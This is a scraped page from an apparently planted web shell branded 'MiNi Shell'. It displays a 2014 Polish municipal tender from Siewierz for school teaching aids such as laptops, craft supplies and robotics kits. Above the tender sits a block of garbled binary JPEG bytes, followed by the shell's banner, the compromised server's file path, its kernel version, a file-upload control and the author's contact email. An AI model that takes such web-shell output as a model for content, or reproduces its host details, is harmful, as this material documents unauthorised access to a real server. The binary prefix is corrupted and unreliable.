JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140929/321600-N-2014.html

<p class="kh_header"><b>Siewierz: Dostawa pomocy dydaktycznych w ramach realizacji projektu Kompetencje kluczowe szansą na sukces uczniów 
z terenu Gminy Siewierz</b><br>
<b>Numer ogłoszenia: 321600 - 2014; data zamieszczenia: 29.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siewierz , ul. Żwirki i Wigury 16, 42-470 Siewierz, woj. śląskie, tel. 0326499471, 6499400, faks 032 6499402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siewierz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych w ramach realizacji projektu Kompetencje kluczowe szansą na sukces uczniów 
z terenu Gminy Siewierz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje zakup i  dostawę   pomocy dydaktycznych niezbędnych do realizacji pięciu zadań realizowanych w ramach projektu Kompetencje kluczowe szansą na sukces uczniów z terenu Gminy Siewierz. Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 6 do specyfikacji istotnych warunków zamówienia. Opis przedmiotu zamówienia będzie stanowił załącznik do umowy z Wykonawcą
2.	Wszystkie pomoce dydaktyczne muszą być fabrycznie nowe, wolne od wad oraz dopuszczone do stosowania w placówkach oświatowych. Muszą posiadać odpowiednie atesty, certyfikaty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem. Wymagany okres minimalny gwarancji: na sprzęt komputerowy    i multimedialny, czyli pozycje 1 - 8 w ramach Część I. Zakup wraz z dostawą pomocy dydaktycznych dla Zadania 2. Koło filmowe ICT w mediach oraz całość Części V. Zakup wraz z dostawą pomocy dydaktycznych dla Zadania 6. Zajęcia pozalekcyjne                      z robotyki i automatyki wynosi 24 miesiące.
3.	Wykonawca zobowiązuje się do dostarczenia pomocy dydaktycznych własnym transportem i na własny koszt bezpośrednio do miejsca wskazanego przez Zamawiającego w jego siedzibie, tzn. w Urzędzie Miasta i Gminy Siewierz, ul. Żwirki i Wigury 16, 42 -470 Siewierz.
4.	Ilekroć w Opisie Przedmiotu Zamówienia zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) pomocy, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych. Pod pojęciem równoważności rozumieć należy, iż zagwarantują one realizację zamówienia w zgodzie z Opisem Przedmiotu Zamówienia. Zamawiający dopuszcza oferowanie pomocy dydaktycznych o innych zbliżonych wymiarach, kolorach, itp. Z zastrzeżeniem właściwego zachowania przeznaczenia oferowanego przedmiotu.
5.	Projekt Kompetencje kluczowe szansą na sukces uczniów z terenu Gminy Siewierz otrzymał dofinansowanie ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007 - 2013 w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
6.	Zamawiający dopuszcza składanie ofert częściowych zgodnie z art.83 ust.2 ustawy Prawo zamówień publicznych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 30.23.60.00-2, 30.21.31.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz dokumentów  i oświadczeń, jakich żąda Zamawiający od Wykonawcy:
1.	Formularz oferty wg zał. Nr 1.
2.	Pełnomocnictwo do reprezentowania w postępowaniu, jeżeli oferta będzie podpisana przez osobę (y) upoważnioną(e) lub w przypadku występowania podmiotów wspólnie w trybie art.23 ustawy Prawo zamówień publicznych.
3.	Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych, wg zał. Nr 2.
4.	Oświadczenie, że Wykonawca należy/ nie należy  do grupy kapitałowej wraz z listą  podmiotów należących do tej samej grupy kapitałowej zgodnie  z zapisem art. 24 ust. 2 pkt 5 ustawy. wg zał. Nr 6
Oferta podmiotów występujących wspólnie:
1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia  (np. w formie spółki cywilnej, konsorcjum, porozumienia zawartego między podmiotami). Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie  z pełnomocnikiem (liderem).
2.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
3.	W przypadku wspólnego ubiegania się o zamówienie każdy z wykonawców musi wykazać, że nie podlega wykluczeniu  na podstawie art. 24 ust. 1 Ustawy, w tym celu każdy z Wykonawców składających wspólną ofertę powinien złożyć osobno oświadczenie wymienione w punktach  III  4. 2) ORAZ III 4.4)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZGODNIE Z ZAPISAMI W SPECYFIKACJI ISTOTNYCH WARUNKÓW ZAMÓWIENIA</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siewierz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Siewierz 	
ul. Żwirki i Wigury 16
42-470 Siewierz
pok.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy Siewierz 	
ul. Żwirki i Wigury 16
42-470 Siewierz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 5.	Projekt Kompetencje kluczowe szansą na sukces uczniów z terenu Gminy Siewierz otrzymał dofinansowanie ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007 - 2013 w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych
Zamawiający nie przewiduje: przeprowadzenia aukcji elektronicznej, ustanowienia dynamicznego systemu zakupów, zwrotu kosztów  udziału   w postępowaniu,  zawarcia umowy ramowej, udzielania zaliczek na poczet  wykonania zamówienia, oraz nie przewiduje ograniczeń ubiegania się o zamówienie publiczne  wynikających z  art. 29 ust. 4 ustawy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup wraz z dostawą pomocy dydaktycznych dla Zadania 2. Koło filmowe ICT w mediach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności: - zakup wraz z dostawą Tablicy interaktywnej - 1 sztuka, Projektor - 1 sztuka, Laptop - 9 sztuk, Kamera cyfrowa - 4 sztuki, Statyw do kamery - 4 sztuki, Aparat cyfrowy - 3 sztuki, Mikrofon reporterski - 3 sztuki, teleprompter - 1 sztuka, Program komputerowy graficzno - edycyjno-efektowy 5 sztuk, Papier biurowy A4 - 11 ryz. Szczegółowy opis pomocy dydaktycznych znajduje się w Opisie Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.00-9, 30.23.60.00-2, 30.21.31.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup wraz z dostawą pomocy dydaktycznych dla Zadania 3. Młodzieżowa Akademia Przedsiębiorczości Aktywnej - MAPA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności: - zakup wraz z dostawą Indywidualnego Planera Kariery dla Gimnazjalisty - segregatora i płyty CD - 4 sztuki oraz materiałów biurowych(papier flipchart, markery, papier) - 18 kompletów. Szczegółowy opis pomocy dydaktycznych znajduje się w Opisie Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup wraz z dostawą pomocy dydaktycznych dla Zadania 4. Teatr w językach obcych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:  zakup wraz z dostawą następujących pomocy dydaktycznych: Maski białe do zdobienia - 21 kompletów, Figurki do kukiełek - 120 sztuk, Łyżki drewniane do przygotowywania kukiełek - 21 kompletów, Skarpetki do mapetów - 21 kompletów, Piankowe kształty - 21 kompletów, Filc samoprzylepny - 21 kompletów, Zestaw papierów kolorowych - 21 sztuk, Bibuła kolorowa paski mix - 252 sztuki, Krepina (np.: zebra, tygrys, leopard, krowa) - 108 sztuk, Kolorowe papiery w rolce (np.: czerwony, zielony, żółty, niebieski, morski) - 21 kompletów, Papier szary - 21 kompletów, Pędzle mix 24 - 21 kompletów, Pędzle szerokie - 21 kompletów, Tkaniny do uszycia strojów - 21 kompletów, Kredki akwarelowe - 21 kompletów, Kredki grube trójkątne, zestaw klasowy - 21 kompletów, Mazaki dwustronne - 21 kompletów, Farby kolory pochodne - 21 kompletów, Karbownica do papieru - 21 sztuk, Nożyczki - 21 sztuk, Nożyczki ergo - 21 kompletów, Klej uniwersalny 1 litr - 21 sztuk, Taśma dwustronna - 21 sztuk, Figurki ze styropianu (np.: marchew, grzyb, papryka, jabłko, itp.) po 8 sztuk - 21 kompletów, Trawka dekoracyjna (np.: zielona, żółta, biała) - 21 kompletów, Torba z instrumentami muzycznymi - 8 sztuk, Lalka Samanta - - 8 sztuk, Lalka Jaś - 8 sztuk. Szczegółowy opis pomocy dydaktycznych znajduje się w Opisie Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.62.10-0, 39.16.21.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup wraz z dostawą pomocy dydaktycznych dla Zadania 5. Młody Europejczyk - warsztaty językowo - kulturowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:  - zakup wraz z dostawą następujących pomocy dydaktycznych: Słowniki (także multimedialne) - 25 sztuk, Programy komputerowe do nauki języka obcego - 114 sztuk, Plansze dydaktyczne - 5 kompletów, Płyty CD z piosenkami w języku obcym wraz z tekstami piosenek zestaw 2 płyt na placówkę - 5 kompletów, Gry planszowe do ćwiczeń podstawowego słownictwa, np. typu memory, bingo, domino - 36 sztuk, Albumy dotyczące danego kraju - 36 sztuk, Flagi danych krajów - 24 sztuki, Zestawy plastyczne (zawierające m.in.: pastele olejne, farby plakatowe, bibułę kolorową zestaw kolorów, bloki techniczne, klej typu magic, plastelina, modelina, itp.) - 114 kompletów. Szczegółowy opis pomocy dydaktycznych znajduje się w Opisie Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup wraz z dostawą  pomocy dydaktycznych dla Zadania 6. Zajęcia pozalekcyjne z robotyki i automatyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności:  
- zakup wraz z dostawą następujących pomocy dydaktycznych: Komputerowa jednostka centralna (główny element sterujący) umożliwiający konstruowanie robotów i układów automatyki - 44 sztuki, 3 niezależne silniki ( z wbudowaniem czujnikiem obrotów) - 44 zestawy, 2 czujniki dotyków, czujnik koloru, dalmierz ultradźwiękowy, czujnik natężenia dźwięku lub żyroskopu - 44 zestawy, Klocki oraz elementy dodatkowe - 44 zestawy, Zasilacz - 22 sztuki, Oprogramowanie - 4 sztuki, Licencja wielostanowiskowa - 4 sztuki. Szczegółowy opis pomocy dydaktycznych znajduje się w Opisie Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 30.23.60.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com